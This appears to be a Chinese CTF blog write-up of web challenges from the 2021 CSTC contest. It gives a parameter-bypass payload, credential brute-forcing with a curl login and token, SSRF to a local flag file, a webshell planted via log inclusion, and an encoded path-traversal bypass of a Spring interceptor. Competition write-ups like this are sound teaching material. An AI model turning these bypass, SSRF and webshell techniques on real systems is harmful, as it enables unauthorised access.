<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="五一假期结束太快了，早上起来想偷懒睡觉被 @LemonPrefect 师傅拖起来做题，中午想睡午觉被 @Guoke 师傅拖起来做题，最后是和师傅们一起 A 了四道 web（guoke 太猛了），晚上出去了最后没来得及做 web5，随便贴贴当时记录的文档吧，好像也没有复现了。 ezweb简单的绕过，payload： ?foo&#x3D;&amp;#123;&quot;bar1&quot;:&quot;2022a&amp;qu">
<meta property="og:type" content="article">
<meta property="og:title" content="2021_CSTC_WP">
<meta property="og:url" content="http://example.com/2021/05/06/2021-CSTC-WP/index.html">
<meta property="og:site_name" content="Du1L0v3">
<meta property="og:description" content="五一假期结束太快了，早上起来想偷懒睡觉被 @LemonPrefect 师傅拖起来做题，中午想睡午觉被 @Guoke 师傅拖起来做题，最后是和师傅们一起 A 了四道 web（guoke 太猛了），晚上出去了最后没来得及做 web5，随便贴贴当时记录的文档吧，好像也没有复现了。 ezweb简单的绕过，payload： ?foo&#x3D;&amp;#123;&quot;bar1&quot;:&quot;2022a&amp;qu">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://i.loli.net/2021/05/06/OILkxSRHgavoXc5.png">
<meta property="og:image" content="https://i.loli.net/2021/05/06/hrvM6FaG8oXdb9k.png">
<meta property="article:published_time" content="2021-05-05T16:08:25.000Z">
<meta property="article:modified_time" content="2021-11-03T13:32:13.123Z">
<meta property="article:author" content="Du1L0v3">
<meta property="article:tag" content="WriteUp">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/05/06/OILkxSRHgavoXc5.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>2021_CSTC_WP</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<!--
<link rel="stylesheet" href="//cdn.bootcss.com/highlight.js/9.2.0/styles/github.min.css">
<script src="//cdn.bootcss.com/highlight.js/9.2.0/highlight.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script>
-->
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" "Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/duitutu">Projects</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post " href="/2021/05/07/%E9%93%81%E4%B8%89%E7%BA%BF%E4%B8%8B%E4%B9%8B%E6%97%85/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post " href="/2021/05/04/2021-PYCC-WEB5-WP/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top " href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post " href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/05/06/2021-CSTC-WP/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/05/06/2021-CSTC-WP/&text=2021_CSTC_WP"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/05/06/2021-CSTC-WP/&title=2021_CSTC_WP"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/05/06/2021-CSTC-WP/&is_video=false&description=2021_CSTC_WP"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=2021_CSTC_WP&body=Check out this article: http://example.com/2021/05/06/2021-CSTC-WP/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/05/06/2021-CSTC-WP/&title=2021_CSTC_WP"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/05/06/2021-CSTC-WP/&title=2021_CSTC_WP"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/05/06/2021-CSTC-WP/&title=2021_CSTC_WP"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/05/06/2021-CSTC-WP/&title=2021_CSTC_WP"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/05/06/2021-CSTC-WP/&name=2021_CSTC_WP&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/05/06/2021-CSTC-WP/&t=2021_CSTC_WP"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#ezweb"><span class="toc-number">1.</span> <span class="toc-text">ezweb</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#easyweb2"><span class="toc-number">2.</span> <span class="toc-text">easyweb2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ctfweb3"><span class="toc-number">3.</span> <span class="toc-text">ctfweb3</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#hackerweb"><span class="toc-number">4.</span> <span class="toc-text">hackerweb</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#superadmin"><span class="toc-number">5.</span> <span class="toc-text">superadmin</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        2021_CSTC_WP
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Du1L0v3</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-05-05T16:08:25.000Z" itemprop="datePublished">2021-05-06</time>
        
        (Updated: <time datetime="2021-11-03T13:32:13.123Z" itemprop="dateModified">2021-11-03</time>)
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/WriteUp/">WriteUp</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/CTF/" rel="tag">CTF</a>, <a class="tag-link-link" href="/tags/WriteUp/" rel="tag">WriteUp</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>五一假期结束太快了，早上起来想偷懒睡觉被 @LemonPrefect 师傅拖起来做题，中午想睡午觉被 @Guoke 师傅拖起来做题，最后是和师傅们一起 A 了四道 web（guoke 太猛了），晚上出去了最后没来得及做 web5，随便贴贴当时记录的文档吧，好像也没有复现了。</p>
<h2 id="ezweb"><a href="#ezweb" class="headerlink" title="ezweb"></a>ezweb</h2><p>简单的绕过，payload：</p>
<p><code>?foo=&#123;&quot;bar1&quot;:&quot;2022a&quot;,&quot;bar2&quot;:[[],2,3,4,5],&quot;a2&quot;:[&quot;nudt&quot;]&#125;&amp;cat[0]=%00cstc2021&amp;cat[1]=1&amp;dog[]=%00</code></p>
<h2 id="easyweb2"><a href="#easyweb2" class="headerlink" title="easyweb2"></a>easyweb2</h2><p><code>http://49.232.167.183:30013/swagger-resources/configuration/ui</code></p>
<p>好像是这个地方吧，可以看到所有路由，有个爆破UID的接口。通过爆破UID。得到900多的一个ctf_admin账号以及密码md5解密得到ctfer123!@#</p>
<p><code>curl -X GET &quot;http://49.232.167.183:30012/login?username=ctf_admin&amp;password=ctfer123!%40%23&quot;</code></p>
<p>获得 token：9c618e664319512ef7db2d3c0672bee0</p>
<p>然后 ssrf 访问 <code>ftp://localhost/flag.txt</code> 得到flag。</p>
<h2 id="ctfweb3"><a href="#ctfweb3" class="headerlink" title="ctfweb3"></a>ctfweb3</h2><p>访问 robots.txt，存在 <code>/PassOn/</code>，源码泄露：</p>
<p><code>http://49.232.3.115:49400/PassOn/PassOnbackupDirect0ry/info.php</code></p>
<p>style.css 中发现用户 Ptn4rdn <a href="mailto:&#x50;&#x74;&#110;&#x34;&#114;&#x64;&#x6e;&#x40;&#x67;&#109;&#97;&#105;&#x6c;&#46;&#x63;&#x6f;&#109;">&#x50;&#x74;&#110;&#x34;&#114;&#x64;&#x6e;&#x40;&#x67;&#109;&#97;&#105;&#x6c;&#46;&#x63;&#x6f;&#109;</a></p>
<p>reset 申请改一下密码，login 写🐎，然后访问日志完事。</p>
<h2 id="hackerweb"><a href="#hackerweb" class="headerlink" title="hackerweb"></a>hackerweb</h2><p>存在 /login 路由，java 题。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Configuration</span></span><br><span class="line">	<span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">WebMvcConfig</span> <span class="keyword">implements</span> <span class="title">WebMvcConfigurer</span> </span>&#123;</span><br><span class="line">	<span class="meta">@Override</span></span><br><span class="line">	<span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">addInterceptors</span><span class="params">(InterceptorRegistry registry)</span> </span>&#123;</span><br><span class="line">	registry.addInterceptor(handlerInterceptor())</span><br><span class="line">	.addPathPatterns(<span class="string">&quot;/**&quot;</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	<span class="meta">@Bean</span></span><br><span class="line">	<span class="function"><span class="keyword">public</span> HandlerInterceptor <span class="title">handlerInterceptor</span><span class="params">()</span> </span>&#123;</span><br><span class="line">	<span class="keyword">return</span> <span class="keyword">new</span> PermissionInterceptor();</span><br><span class="line">	&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	<span class="meta">@Component</span></span><br><span class="line">	<span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">PermissionInterceptor</span> <span class="keyword">implements</span> <span class="title">HandlerInterceptor</span> </span>&#123;</span><br><span class="line">	<span class="meta">@Override</span></span><br><span class="line">	<span class="function"><span class="keyword">public</span> <span class="keyword">boolean</span> <span class="title">preHandle</span><span class="params">(HttpServletRequest request,</span></span></span><br><span class="line"><span class="function"><span class="params">	HttpServletResponse response,</span></span></span><br><span class="line"><span class="function"><span class="params">	Object handler)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">	String uri = request.getRequestURI();</span><br><span class="line">	uri = uri.replaceAll(<span class="string">&quot;//&quot;</span>, <span class="string">&quot;/&quot;</span>);</span><br><span class="line">	System.out.println(<span class="string">&quot;RequestURI: &quot;</span> + uri);</span><br><span class="line">	<span class="keyword">if</span> (uri.contains(<span class="string">&quot;..&quot;</span>) || uri.contains(<span class="string">&quot;./&quot;</span>)) &#123;</span><br><span class="line">	<span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span> (uri.startsWith(<span class="string">&quot;/login&quot;</span>) || uri.startsWith(<span class="string">&quot;/index&quot;</span>) || uri.startsWith(<span class="string">&quot;/image&quot;</span>) || uri.startsWith(<span class="string">&quot;/css&quot;</span>)) &#123;</span><br><span class="line">	<span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<p>可以 <code>POST /login/%2e%2e/%61%64%6d%69%6e</code> 绕。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Username&#x3D;admin&amp;Password&#x3D;admin</span><br></pre></td></tr></table></figure>

<p>发现 domain &amp; secert，这里纠结了很久。</p>
<p><img src="https://i.loli.net/2021/05/06/OILkxSRHgavoXc5.png"></p>
<p>domain 处传 dns 试试，回显 127.0.0.1，同时 dnslog 也有了回显：</p>
<p><img src="https://i.loli.net/2021/05/06/hrvM6FaG8oXdb9k.png"></p>
<p>总共大概是这四个：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ea197db0 bf03c5f3 8841a402 75aaaf2e</span><br></pre></td></tr></table></figure>

<p>secert 处排列组合交一下 flag 就出了。</p>
<hr>
<p>顺带一提，这里是出题人英语比👴还差，打错单词了（secert -&gt; secret</p>
<h2 id="superadmin"><a href="#superadmin" class="headerlink" title="superadmin"></a>superadmin</h2><p>register 处 sql 注入，还没做出来，等一波赛后 wp 吧。</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/duitutu">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#ezweb"><span class="toc-number">1.</span> <span class="toc-text">ezweb</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#easyweb2"><span class="toc-number">2.</span> <span class="toc-text">easyweb2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ctfweb3"><span class="toc-number">3.</span> <span class="toc-text">ctfweb3</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#hackerweb"><span class="toc-number">4.</span> <span class="toc-text">hackerweb</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#superadmin"><span class="toc-number">5.</span> <span class="toc-text">superadmin</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/05/06/2021-CSTC-WP/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/05/06/2021-CSTC-WP/&text=2021_CSTC_WP"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/05/06/2021-CSTC-WP/&title=2021_CSTC_WP"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/05/06/2021-CSTC-WP/&is_video=false&description=2021_CSTC_WP"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=2021_CSTC_WP&body=Check out this article: http://example.com/2021/05/06/2021-CSTC-WP/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/05/06/2021-CSTC-WP/&title=2021_CSTC_WP"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/05/06/2021-CSTC-WP/&title=2021_CSTC_WP"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/05/06/2021-CSTC-WP/&title=2021_CSTC_WP"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/05/06/2021-CSTC-WP/&title=2021_CSTC_WP"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/05/06/2021-CSTC-WP/&name=2021_CSTC_WP&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/05/06/2021-CSTC-WP/&t=2021_CSTC_WP"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2021
    Du1L0v3
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/duitutu">Projects</a></li>
        
         <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
         <span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdn.bootcdn.net/ajax/libs/font-awesome/5.15.2/css/all.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdn.bootcdn.net/ajax/libs/jquery/3.6.0/jquery.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.bootcdn.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->


</body>
</html>
